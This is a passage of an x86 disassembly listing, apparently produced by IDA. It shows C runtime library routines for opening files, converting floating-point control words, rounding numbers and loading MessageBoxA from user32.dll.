jmp loc_41E4D2
; ---------------------------------------------------------------------------
loc_41E594: ; CODE XREF: sub_41E476+E0�j
; sub_41E476+113�j
mov [ebp+var_8], 5
jmp short loc_41E5A4
; ---------------------------------------------------------------------------
loc_41E59D: ; CODE XREF: sub_41E476+10B�j
; sub_41E476+117�j
mov [ebp+var_8], 1
loc_41E5A4: ; CODE XREF: sub_41E476+F5�j
; sub_41E476+FE�j ...
mov eax, [ebp+arg_4]
mov esi, 80h
test eax, edi
jz short loc_41E5C3
mov ecx, dword_51588C
not ecx
and ecx, [ebp+arg_C]
test cl, 80h
jnz short loc_41E5C3
push 1
pop esi
loc_41E5C3: ; CODE XREF: sub_41E476+138�j
; sub_41E476+148�j
test al, 40h
jz short loc_41E5D1
or esi, 4000000h
or byte ptr [ebp+var_C+2], 1
loc_41E5D1: ; CODE XREF: sub_41E476+14F�j
test ah, 10h
jz short loc_41E5D8
or esi, edi
loc_41E5D8: ; CODE XREF: sub_41E476+15E�j
test al, 20h
jz short loc_41E5E4
or esi, 8000000h
jmp short loc_41E5EE
; ---------------------------------------------------------------------------
loc_41E5E4: ; CODE XREF: sub_41E476+164�j
test al, 10h
jz short loc_41E5EE
or esi, 10000000h
loc_41E5EE: ; CODE XREF: sub_41E476+16C�j
; sub_41E476+170�j
call sub_41E25C
mov ebx, eax
or edi, 0FFFFFFFFh
cmp ebx, edi
jnz short loc_41E60F
and dword_515888, 0
mov dword_515884, 18h
jmp short loc_41E64D
; ---------------------------------------------------------------------------
loc_41E60F: ; CODE XREF: sub_41E476+184�j
push 0
push esi
push [ebp+var_8]
lea eax, [ebp+var_1C]
push eax
push [ebp+var_10]
push [ebp+var_C]
push [ebp+arg_0]
nop
call near ptr 7C801A24h
mov esi, eax
cmp esi, edi
jz short loc_41E640
push esi
nop
call near ptr 7C810E51h
test eax, eax
jnz short loc_41E654
push esi
nop
call near ptr 7C809B47h
loc_41E640: ; CODE XREF: sub_41E476+1B6�j
nop
call near ptr 7C910331h
push eax
call sub_41C91A
pop ecx
loc_41E64D: ; CODE XREF: sub_41E476+197�j
mov eax, edi
jmp loc_41E72A
; ---------------------------------------------------------------------------
loc_41E654: ; CODE XREF: sub_41E476+1C1�j
cmp eax, 2
jnz short loc_41E65F
or [ebp+var_1], 40h
jmp short loc_41E668
; ---------------------------------------------------------------------------
loc_41E65F: ; CODE XREF: sub_41E476+1E1�j
cmp eax, 3
jnz short loc_41E668
or [ebp+var_1], 8
loc_41E668: ; CODE XREF: sub_41E476+1E7�j
; sub_41E476+1EC�j
push esi
push ebx
call sub_41E2F1
pop ecx
mov al, [ebp+var_1]
pop ecx
mov esi, ebx
mov ecx, ebx
or al, 1
sar ecx, 5
and esi, 1Fh
mov byte ptr [ebp+arg_0+3], al
lea edi, ds:516B80h[ecx*4]
shl esi, 3
mov ecx, [edi]
and byte ptr [ebp+arg_0+3], 48h
mov [ecx+esi+4], al
jnz short loc_41E711
test al, 80h
jz short loc_41E711
test byte ptr [ebp+arg_4], 2
jz short loc_41E711
push 2
push 0FFFFFFFFh
push ebx
call sub_41BA39
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jnz short loc_41E6C6
cmp dword_515888, 83h
jz short loc_41E711
jmp short loc_41E705
; ---------------------------------------------------------------------------
loc_41E6C6: ; CODE XREF: sub_41E476+240�j
and byte ptr [ebp+arg_8+3], 0
lea eax, [ebp+arg_8+3]
push 1
push eax
push ebx
call sub_41B65B
add esp, 0Ch
test eax, eax
jnz short loc_41E6F3
cmp byte ptr [ebp+arg_8+3], 1Ah
jnz short loc_41E6F3
push [ebp+var_10]
push ebx
call sub_41F038
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41E705
loc_41E6F3: ; CODE XREF: sub_41E476+265�j
; sub_41E476+26B�j
push 0
push 0
push ebx
call sub_41BA39
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jnz short loc_41E711
loc_41E705: ; CODE XREF: sub_41E476+24E�j
; sub_41E476+27B�j
push ebx
call sub_41B397
pop ecx
loc_41E70C: ; CODE XREF: sub_41E476+6C�j
or eax, 0FFFFFFFFh
jmp short loc_41E72A
; ---------------------------------------------------------------------------
loc_41E711: ; CODE XREF: sub_41E476+221�j
; sub_41E476+225�j ...
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_41E728
test byte ptr [ebp+arg_4], 8
jz short loc_41E728
mov eax, [edi]
or byte ptr [eax+esi+4], 20h
lea eax, [eax+esi+4]
loc_41E728: ; CODE XREF: sub_41E476+29F�j
; sub_41E476+2A5�j
mov eax, ebx
loc_41E72A: ; CODE XREF: sub_41E476+1D9�j
; sub_41E476+299�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E476 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E72F proc near ; CODE XREF: sub_41E764+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
fstcw word ptr [ebp+var_4]
push [ebp+var_4]
call sub_41E77A
mov esi, eax
mov eax, [ebp+arg_4]
not eax
and esi, eax
mov eax, [ebp+arg_0]
and eax, [ebp+arg_4]
or esi, eax
push esi
call sub_41E80C
pop ecx
mov [ebp+arg_4], eax
pop ecx
fldcw word ptr [ebp+arg_4]
mov eax, esi
pop esi
leave
retn
sub_41E72F endp
; =============== S U B R O U T I N E =======================================
sub_41E764 proc near ; CODE XREF: sub_41C466+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
and eax, 0FFF7FFFFh
push eax
push [esp+4+arg_0]
call sub_41E72F
pop ecx
pop ecx
retn
sub_41E764 endp
; =============== S U B R O U T I N E =======================================
sub_41E77A proc near ; CODE XREF: sub_41E72F+C�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push ebp
test bl, 1
push edi
jz short loc_41E78B
push 10h
pop eax
loc_41E78B: ; CODE XREF: sub_41E77A+C�j
test bl, 4
jz short loc_41E792
or al, 8
loc_41E792: ; CODE XREF: sub_41E77A+14�j
test bl, 8
jz short loc_41E799
or al, 4
loc_41E799: ; CODE XREF: sub_41E77A+1B�j
test bl, 10h
jz short loc_41E7A0
or al, 2
loc_41E7A0: ; CODE XREF: sub_41E77A+22�j
test bl, 20h
jz short loc_41E7A7
or al, 1
loc_41E7A7: ; CODE XREF: sub_41E77A+29�j
test bl, 2
jz short loc_41E7B1
or eax, 80000h
loc_41E7B1: ; CODE XREF: sub_41E77A+30�j
movzx ecx, bx
push esi
mov edx, ecx
mov esi, 0C00h
mov edi, 300h
and edx, esi
mov ebp, 200h
jz short loc_41E7E9
cmp edx, 400h
jz short loc_41E7E6
cmp edx, 800h
jz short loc_41E7E2
cmp edx, esi
jnz short loc_41E7E9
or eax, edi
jmp short loc_41E7E9
; ---------------------------------------------------------------------------
loc_41E7E2: ; CODE XREF: sub_41E77A+5E�j
or eax, ebp
jmp short loc_41E7E9
; ---------------------------------------------------------------------------
loc_41E7E6: ; CODE XREF: sub_41E77A+56�j
or ah, 1
loc_41E7E9: ; CODE XREF: sub_41E77A+4E�j
; sub_41E77A+62�j ...
and ecx, edi
pop esi
jz short loc_41E7F9
cmp ecx, ebp
jnz short loc_41E7FE
or eax, 10000h
jmp short loc_41E7FE
; ---------------------------------------------------------------------------
loc_41E7F9: ; CODE XREF: sub_41E77A+72�j
or eax, 20000h
loc_41E7FE: ; CODE XREF: sub_41E77A+76�j
; sub_41E77A+7D�j
pop edi
pop ebp
test bh, 10h
pop ebx
jz short locret_41E80B
or eax, 40000h
locret_41E80B: ; CODE XREF: sub_41E77A+8A�j
retn
sub_41E77A endp
; =============== S U B R O U T I N E =======================================
sub_41E80C proc near ; CODE XREF: sub_41E72F+23�p
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
xor eax, eax
push esi
test bl, 10h
jz short loc_41E81C
push 1
pop eax
loc_41E81C: ; CODE XREF: sub_41E80C+B�j
test bl, 8
jz short loc_41E823
or al, 4
loc_41E823: ; CODE XREF: sub_41E80C+13�j
test bl, 4
jz short loc_41E82A
or al, 8
loc_41E82A: ; CODE XREF: sub_41E80C+1A�j
test bl, 2
jz short loc_41E831
or al, 10h
loc_41E831: ; CODE XREF: sub_41E80C+21�j
test bl, 1
jz short loc_41E838
or al, 20h
loc_41E838: ; CODE XREF: sub_41E80C+28�j
test ebx, 80000h
jz short loc_41E842
or al, 2
loc_41E842: ; CODE XREF: sub_41E80C+32�j
mov ecx, ebx
mov edx, 300h
and ecx, edx
mov esi, 200h
jz short loc_41E86F
cmp ecx, 100h
jz short loc_41E86C
cmp ecx, esi
jz short loc_41E867
cmp ecx, edx
jnz short loc_41E86F
or ah, 0Ch
jmp short loc_41E86F
; ---------------------------------------------------------------------------
loc_41E867: ; CODE XREF: sub_41E80C+50�j
or ah, 8
jmp short loc_41E86F
; ---------------------------------------------------------------------------
loc_41E86C: ; CODE XREF: sub_41E80C+4C�j
or ah, 4
loc_41E86F: ; CODE XREF: sub_41E80C+44�j
; sub_41E80C+54�j ...
mov ecx, ebx
and ecx, 30000h
jz short loc_41E885
cmp ecx, 10000h
jnz short loc_41E887
or eax, esi
jmp short loc_41E887
; ---------------------------------------------------------------------------
loc_41E885: ; CODE XREF: sub_41E80C+6B�j
or eax, edx
loc_41E887: ; CODE XREF: sub_41E80C+73�j
; sub_41E80C+77�j
pop esi
test ebx, 40000h
pop ebx
jz short locret_41E894
or ah, 10h
locret_41E894: ; CODE XREF: sub_41E80C+83�j
retn
sub_41E80C endp
; =============== S U B R O U T I N E =======================================
sub_41E895 proc near ; CODE XREF: sub_41E934+48�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
push 20h
cdq
pop ecx
idiv ecx
push 1Fh
mov esi, eax
mov eax, [esp+8+arg_4]
cdq
idiv ecx
pop ecx
mov eax, [esp+4+arg_0]
sub ecx, edx
or edx, 0FFFFFFFFh
shl edx, cl
not edx
test [eax+esi*4], edx
jnz short loc_41E8DA
inc esi
cmp esi, 3
jge short loc_41E8D5
lea eax, [eax+esi*4]
loc_41E8C7: ; CODE XREF: sub_41E895+3E�j
cmp dword ptr [eax], 0
jnz short loc_41E8DA
inc esi
add eax, 4
cmp esi, 3
jl short loc_41E8C7
loc_41E8D5: ; CODE XREF: sub_41E895+2D�j
push 1
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E8DA: ; CODE XREF: sub_41E895+27�j
; sub_41E895+35�j
xor eax, eax
pop esi
retn
sub_41E895 endp
; =============== S U B R O U T I N E =======================================
sub_41E8DE proc near ; CODE XREF: sub_41E934+57�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push ebx
push esi
push edi
push 20h
mov ebx, [esp+10h+arg_0]
cdq
pop ecx
idiv ecx
mov esi, eax
mov eax, [esp+0Ch+arg_4]
cdq
idiv ecx
lea edi, [ebx+esi*4]
push edi
push 1Fh
pop ecx
push 1
pop eax
sub ecx, edx
shl eax, cl
push eax
push dword ptr [edi]
call sub_41F17E
add esp, 0Ch
dec esi
js short loc_41E930
lea edi, [ebx+esi*4]
loc_41E917: ; CODE XREF: sub_41E8DE+50�j
test eax, eax
jz short loc_41E930
push edi
push 1
push dword ptr [edi]
call sub_41F17E
add esp, 0Ch
dec esi
sub edi, 4
test esi, esi
jge short loc_41E917
loc_41E930: ; CODE XREF: sub_41E8DE+34�j
; sub_41E8DE+3B�j
pop edi
pop esi
pop ebx
retn
sub_41E8DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E934 proc near ; CODE XREF: sub_41EA8F+81�p
; sub_41EA8F+CC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
lea edi, [eax-1]
push 20h
pop ecx
and [ebp+var_4], 0
lea ebx, [edi+1]
push 20h
mov eax, ebx
pop esi
cdq
idiv ecx
push 1Fh
mov ecx, eax
mov eax, ebx
cdq
idiv esi
mov eax, [ebp+arg_0]
pop esi
push 1
mov [ebp+var_8], ecx
lea eax, [eax+ecx*4]
mov [ebp+arg_4], eax
sub esi, edx
pop edx
mov ecx, esi
shl edx, cl
test [eax], edx
jz short loc_41E998
inc ebx
push ebx
push [ebp+arg_0]
call sub_41E895
pop ecx
test eax, eax
pop ecx
jnz short loc_41E995
push edi
push [ebp+arg_0]
call sub_41E8DE
pop ecx
mov [ebp+var_4], eax
pop ecx
loc_41E995: ; CODE XREF: sub_41E934+51�j
mov eax, [ebp+arg_4]
loc_41E998: ; CODE XREF: sub_41E934+41�j
or edx, 0FFFFFFFFh
mov ecx, esi
shl edx, cl
push 3
pop ecx
and [eax], edx
mov eax, [ebp+var_8]
inc eax
cmp eax, ecx
jge short loc_41E9B8
mov edx, [ebp+arg_0]
sub ecx, eax
lea edi, [edx+eax*4]
xor eax, eax
rep stosd
loc_41E9B8: ; CODE XREF: sub_41E934+76�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41E934 endp
; =============== S U B R O U T I N E =======================================
sub_41E9C0 proc near ; CODE XREF: sub_41EA8F+75�p
; sub_41EA8F+B6�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
push esi
push 3
sub ecx, eax
pop edx
loc_41E9CE: ; CODE XREF: sub_41E9C0+17�j
mov esi, [eax]
mov [ecx+eax], esi
add eax, 4
dec edx
jnz short loc_41E9CE
pop esi
retn
sub_41E9C0 endp
; =============== S U B R O U T I N E =======================================
sub_41E9DB proc near ; CODE XREF: sub_41EA8F+5F�p
; sub_41EA8F+9E�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor eax, eax
stosd
stosd
stosd
pop edi
retn
sub_41E9DB endp
; =============== S U B R O U T I N E =======================================
sub_41E9E7 proc near ; CODE XREF: sub_41EA8F+4D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_41E9ED: ; CODE XREF: sub_41E9E7+12�j
cmp dword ptr [eax], 0
jnz short loc_41E9FF
inc ecx
add eax, 4
cmp ecx, 3
jl short loc_41E9ED
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41E9FF: ; CODE XREF: sub_41E9E7+9�j
xor eax, eax
retn
sub_41E9E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EA02 proc near ; CODE XREF: sub_41EA8F+C0�p
; sub_41EA8F+DA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
push 20h
mov edi, [ebp+arg_0]
pop ebx
or esi, 0FFFFFFFFh
cdq
mov ecx, ebx
mov [ebp+var_4], 3
idiv ecx
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
cdq
idiv ecx
and [ebp+arg_4], 0
mov ecx, edx
shl esi, cl
sub ebx, edx
not esi
loc_41EA38: ; CODE XREF: sub_41EA02+58�j
mov eax, [edi]
mov ecx, eax
and ecx, esi
mov [ebp+var_8], ecx
mov ecx, edx
shr eax, cl
or eax, [ebp+arg_4]
mov [edi], eax
mov eax, [ebp+var_8]
mov ecx, ebx
add edi, 4
shl eax, cl
dec [ebp+var_4]
mov [ebp+arg_4], eax
jnz short loc_41EA38
mov edi, [ebp+var_C]
push 2
pop ebx
mov esi, edi
push 8
pop ecx
shl esi, 2
loc_41EA6A: ; CODE XREF: sub_41EA02+86�j
cmp ebx, edi
jl short loc_41EA7D
mov edx, [ebp+arg_0]
mov eax, ecx
sub eax, esi
mov eax, [eax+edx]
mov [ecx+edx], eax
jmp short loc_41EA84
; ---------------------------------------------------------------------------
loc_41EA7D: ; CODE XREF: sub_41EA02+6A�j
mov eax, [ebp+arg_0]
and dword ptr [ecx+eax], 0
loc_41EA84: ; CODE XREF: sub_41EA02+79�j
dec ebx
sub ecx, 4
jns short loc_41EA6A
pop edi
pop esi
pop ebx
leave
retn
sub_41EA02 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EA8F proc near ; CODE XREF: sub_41EBFB+D�p
; sub_41EC11+D�p
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
movzx ecx, word ptr [eax+0Ah]
mov ebx, ecx
and ecx, 8000h
mov [ebp+arg_0], ecx
mov ecx, [eax+6]
mov [ebp+var_C], ecx
mov ecx, [eax+2]
movzx eax, word ptr [eax]
mov edi, [ebp+arg_8]
and ebx, 7FFFh
sub ebx, 3FFFh
mov [ebp+var_8], ecx
shl eax, 10h
cmp ebx, 0FFFFC001h
mov [ebp+var_4], eax
jnz short loc_41EAFC
lea eax, [ebp+var_C]
xor esi, esi
push eax
call sub_41E9E7
test eax, eax
pop ecx
jnz loc_41EBBB
lea eax, [ebp+var_C]
push eax
call sub_41E9DB
pop ecx
loc_41EAF4: ; CODE XREF: sub_41EA8F+E4�j
push 2
loc_41EAF6: ; CODE XREF: sub_41EA8F+110�j
pop eax
jmp loc_41EBBD
; ---------------------------------------------------------------------------
loc_41EAFC: ; CODE XREF: sub_41EA8F+45�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
call sub_41E9C0
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_41E934
add esp, 10h
test eax, eax
jz short loc_41EB1D
inc ebx
loc_41EB1D: ; CODE XREF: sub_41EA8F+8B�j
mov eax, [edi+4]
mov ecx, eax
sub ecx, [edi+8]
cmp ebx, ecx
jge short loc_41EB35
lea eax, [ebp+var_C]
push eax
call sub_41E9DB
pop ecx
jmp short loc_41EB71
; ---------------------------------------------------------------------------
loc_41EB35: ; CODE XREF: sub_41EA8F+98�j
cmp ebx, eax
jg short loc_41EB78
sub eax, ebx
mov esi, eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41E9C0
lea eax, [ebp+var_C]
push esi
push eax
call sub_41EA02
push dword ptr [edi+8]
lea eax, [ebp+var_C]
push eax
call sub_41E934
mov eax, [edi+0Ch]
inc eax
push eax
lea eax, [ebp+var_C]
push eax
call sub_41EA02
add esp, 20h
loc_41EB71: ; CODE XREF: sub_41EA8F+A4�j
xor esi, esi
jmp loc_41EAF4
; ---------------------------------------------------------------------------
loc_41EB78: ; CODE XREF: sub_41EA8F+A8�j
cmp ebx, [edi]
jl short loc_41EBA4
lea eax, [ebp+var_C]
push eax
call sub_41E9DB
push dword ptr [edi+0Ch]
or byte ptr [ebp+var_C+3], 80h
lea eax, [ebp+var_C]
push eax
call sub_41EA02
mov esi, [edi+14h]
add esp, 0Ch
add esi, [edi]
push 1
jmp loc_41EAF6
; ---------------------------------------------------------------------------
loc_41EBA4: ; CODE XREF: sub_41EA8F+EB�j
push dword ptr [edi+0Ch]
mov esi, [edi+14h]
and byte ptr [ebp+var_C+3], 7Fh
lea eax, [ebp+var_C]
push eax
add esi, ebx
call sub_41EA02
pop ecx
pop ecx
loc_41EBBB: ; CODE XREF: sub_41EA8F+55�j
xor eax, eax
loc_41EBBD: ; CODE XREF: sub_41EA8F+68�j
push 1Fh
pop ecx
sub ecx, [edi+0Ch]
mov edi, [edi+10h]
shl esi, cl
mov ecx, [ebp+arg_0]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or esi, ecx
or esi, [ebp+var_C]
cmp edi, 40h
jnz short loc_41EBEC
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_8]
mov [ecx+4], esi
mov [ecx], edx
jmp short loc_41EBF6
; ---------------------------------------------------------------------------
loc_41EBEC: ; CODE XREF: sub_41EA8F+14E�j
cmp edi, 20h
jnz short loc_41EBF6
mov ecx, [ebp+arg_4]
mov [ecx], esi
loc_41EBF6: ; CODE XREF: sub_41EA8F+15B�j
; sub_41EA8F+160�j
pop edi
pop esi
pop ebx
leave
retn
sub_41EA8F endp
; =============== S U B R O U T I N E =======================================
sub_41EBFB proc near ; CODE XREF: sub_41EC27+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_43BF20
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41EA8F
add esp, 0Ch
retn
sub_41EBFB endp
; =============== S U B R O U T I N E =======================================
sub_41EC11 proc near ; CODE XREF: sub_41EC54+23�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push offset dword_43BF38
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41EA8F
add esp, 0Ch
retn
sub_41EC11 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EC27 proc near ; CODE XREF: sub_41C59F+12�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41F31F
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_41EBFB
add esp, 24h
leave
retn
sub_41EC27 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EC54 proc near ; CODE XREF: sub_41C59F+2D�p
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
xor eax, eax
push eax
push eax
push eax
push eax
push [ebp+arg_4]
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_C]
push eax
call sub_41F31F
push [ebp+arg_0]
lea eax, [ebp+var_C]
push eax
call sub_41EC11
add esp, 24h
leave
retn
sub_41EC54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EC81 proc near ; CODE XREF: sub_41C5DD+65�p
; sub_41C6E1+63�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
mov ecx, [edx+0Ch]
push edi
lea edi, [esi+1]
mov byte ptr [esi], 30h
test ebx, ebx
mov eax, edi
jle short loc_41ECBE
mov [ebp+arg_0], ebx
xor ebx, ebx
loc_41ECA4: ; CODE XREF: sub_41EC81+38�j
mov dl, [ecx]
test dl, dl
jz short loc_41ECB0
movsx edx, dl
inc ecx
jmp short loc_41ECB3
; ---------------------------------------------------------------------------
loc_41ECB0: ; CODE XREF: sub_41EC81+27�j
push 30h
pop edx
loc_41ECB3: ; CODE XREF: sub_41EC81+2D�j
mov [eax], dl
inc eax
dec [ebp+arg_0]
jnz short loc_41ECA4
mov edx, [ebp+arg_8]
loc_41ECBE: ; CODE XREF: sub_41EC81+1C�j
and byte ptr [eax], 0
test ebx, ebx
jl short loc_41ECD7
cmp byte ptr [ecx], 35h
jl short loc_41ECD7
loc_41ECCA: ; CODE XREF: sub_41EC81+52�j
dec eax
cmp byte ptr [eax], 39h
jnz short loc_41ECD5
mov byte ptr [eax], 30h
jmp short loc_41ECCA
; ---------------------------------------------------------------------------
loc_41ECD5: ; CODE XREF: sub_41EC81+4D�j
inc byte ptr [eax]
loc_41ECD7: ; CODE XREF: sub_41EC81+42�j
; sub_41EC81+47�j
cmp byte ptr [esi], 31h
jnz short loc_41ECE1
inc dword ptr [edx+4]
jmp short loc_41ECF3
; ---------------------------------------------------------------------------
loc_41ECE1: ; CODE XREF: sub_41EC81+59�j
push edi
call sub_417AF0
inc eax
push eax
push edi
push esi
call sub_41D840
add esp, 10h
loc_41ECF3: ; CODE XREF: sub_41EC81+5E�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41EC81 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ECF8 proc near ; CODE XREF: sub_41C5DD+3F�p
; sub_41C6E1+46�p ...
var_C = byte ptr -0Ch
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
lea eax, [ebp+arg_0]
push edi
push eax
lea eax, [ebp+var_C]
push eax
call sub_41ED5C
pop ecx
lea esi, [ebp+var_C]
pop ecx
push offset word_515B00
push 0
push 11h
sub esp, 0Ch
mov edi, esp
movsd
movsd
movsw
call sub_41F7F0
mov dword_515B28, eax
add esp, 18h
movsx eax, byte_515B02
mov dword_515B20, eax
pop edi
movsx eax, word_515B00
mov dword_515B24, eax
mov dword_515B2C, offset dword_515B04
mov eax, offset dword_515B20
pop esi
leave
retn
sub_41ECF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ED5C proc near ; CODE XREF: sub_41ECF8+10�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
push edi
mov ax, [edx+6]
mov edi, 7FFh
mov ecx, eax
and eax, 8000h
shr ecx, 4
and ecx, edi
mov [ebp+arg_4], eax
mov eax, [edx+4]
mov edx, [edx]
movzx ebx, cx
mov esi, 80000000h
and eax, 0FFFFFh
test ebx, ebx
mov [ebp+var_4], esi
jz short loc_41EDAA
cmp ebx, edi
jz short loc_41EDA3
lea edi, [ecx+3C00h]
jmp short loc_41EDCB
; ---------------------------------------------------------------------------
loc_41EDA3: ; CODE XREF: sub_41ED5C+3D�j
mov edi, 7FFFh
jmp short loc_41EDCB
; ---------------------------------------------------------------------------
loc_41EDAA: ; CODE XREF: sub_41ED5C+39�j
xor ebx, ebx
cmp eax, ebx
jnz short loc_41EDC2
cmp edx, ebx
jnz short loc_41EDC2
mov eax, [ebp+arg_0]
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], bx
jmp short loc_41EE0D
; ---------------------------------------------------------------------------
loc_41EDC2: ; CODE XREF: sub_41ED5C+52�j
; sub_41ED5C+56�j
lea edi, [ecx+3C01h]
mov [ebp+var_4], ebx
loc_41EDCB: ; CODE XREF: sub_41ED5C+45�j
; sub_41ED5C+4C�j
mov ecx, edx
shr ecx, 15h
shl eax, 0Bh
or ecx, eax
mov eax, [ebp+arg_0]
or ecx, [ebp+var_4]
shl edx, 0Bh
mov [eax+4], ecx
mov [eax], edx
loc_41EDE3: ; CODE XREF: sub_41ED5C+A6�j
test ecx, esi
jnz short loc_41EE04
mov edx, [eax]
add ecx, ecx
mov ebx, edx
shr ebx, 1Fh
or ebx, ecx
lea ecx, [edx+edx]
mov [eax], ecx
mov [eax+4], ebx
add edi, 0FFFFh
mov ecx, ebx
jmp short loc_41EDE3
; ---------------------------------------------------------------------------
loc_41EE04: ; CODE XREF: sub_41ED5C+89�j
mov ecx, [ebp+arg_4]
or ecx, edi
mov [eax+8], cx
loc_41EE0D: ; CODE XREF: sub_41ED5C+64�j
pop edi
pop esi
pop ebx
leave
retn
sub_41ED5C endp
; ---------------------------------------------------------------------------
push 2
call sub_4191E5
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_41EE1B proc near ; CODE XREF: ___:0041CBFA�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_41EE2C
add esp, 0Ch
retn
sub_41EE1B endp
; =============== S U B R O U T I N E =======================================
sub_41EE2C proc near ; CODE XREF: sub_41EE1B+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test byte_516DA1[eax], cl
jnz short loc_41EE59
cmp [esp+arg_4], 0
jz short loc_41EE52
movzx eax, word_43B5AA[eax*2]
and eax, [esp+arg_4]
jmp short loc_41EE54
; ---------------------------------------------------------------------------
loc_41EE52: ; CODE XREF: sub_41EE2C+16�j
xor eax, eax
loc_41EE54: ; CODE XREF: sub_41EE2C+24�j
test eax, eax
jnz short loc_41EE59
retn
; ---------------------------------------------------------------------------
loc_41EE59: ; CODE XREF: sub_41EE2C+F�j
; sub_41EE2C+2A�j
push 1
pop eax
retn
sub_41EE2C endp
; =============== S U B R O U T I N E =======================================
sub_41EE5D proc near ; CODE XREF: sub_41D415+11F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
xor ebx, ebx
cmp dword_515B30, ebx
push esi
push edi
jnz short loc_41EEAC
push offset aUser32_dll ; "user32.dll"
nop
call near ptr 7C801D77h
mov edi, eax
cmp edi, ebx
jz short loc_41EEE2
mov esi, dword_4210D8
push offset aMessageboxa ; "MessageBoxA"
push edi
call esi ; GetProcAddress
test eax, eax
mov dword_515B30, eax
jz short loc_41EEE2
push offset aGetactivewindo ; "GetActiveWindow"
push edi
call esi ; GetProcAddress
push offset aGetlastactivep ; "GetLastActivePopup"
push edi
mov dword_515B34, eax
call esi ; GetProcAddress
mov dword_515B38, eax
loc_41EEAC: ; CODE XREF: sub_41EE5D+B�j
mov eax, dword_515B34
test eax, eax
jz short loc_41EECB
call eax ; GetActiveWindow
mov ebx, eax
test ebx, ebx
jz short loc_41EECB
mov eax, dword_515B38
test eax, eax
jz short loc_41EECB
push ebx
call eax ; GetLastActivePopup
mov ebx, eax
loc_41EECB: ; CODE XREF: sub_41EE5D+56�j
; sub_41EE5D+5E�j ...
